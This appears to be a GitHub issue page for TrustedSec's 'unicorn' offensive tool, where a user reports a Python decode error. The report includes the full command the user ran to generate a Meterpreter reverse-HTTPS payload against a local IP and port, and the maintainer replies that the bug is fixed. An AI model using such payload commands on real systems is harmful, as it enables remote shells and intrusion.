trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com
Other
3.74k stars 817 forks source link

'str' object has no attribute 'decode' #138

Closed ghost closed 4 years ago

ghost commented 4 years ago

Hey I'm having an error when i try to make a payload i use the command python unicorn.py windows/meterpreter/reverse_https 192.168.0.109 443 VirtualBox_kali linux_28_03_2020_21_09_23

I'm using kali linux 2019.4 unicorn version: 3.8.3 python version: 3.8 metasploit version: 5.0.83

HackingDave commented 4 years ago

Fixed in 3.8.6, thanks!